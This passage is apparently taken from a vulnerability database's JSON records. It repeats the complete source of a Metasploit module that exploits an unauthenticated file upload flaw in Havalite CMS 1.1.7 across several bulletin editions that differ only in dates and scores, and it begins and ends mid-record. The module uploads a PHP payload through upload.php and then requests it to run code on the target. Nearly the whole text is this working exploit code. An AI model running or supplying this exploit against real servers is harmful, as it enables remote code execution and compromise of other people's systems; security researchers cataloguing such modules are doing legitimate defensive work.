elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-10-18T07:04:27", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-06T20:00:39", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-06T20:00:39", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-06T20:00:39", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-06T22:00:37", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-06T22:00:37", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-06T22:00:37", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-08T04:04:09", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-08T04:04:09", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-08T04:04:09", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-08T06:04:32", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-08T06:04:32", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-08T06:04:32", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T08:04:36", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-20T08:04:36", "value": null}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-20T08:04:36", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T10:03:06", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-01-20T10:03:06", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-01-20T10:03:06", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-06T20:14:55", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-06T20:14:55", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n 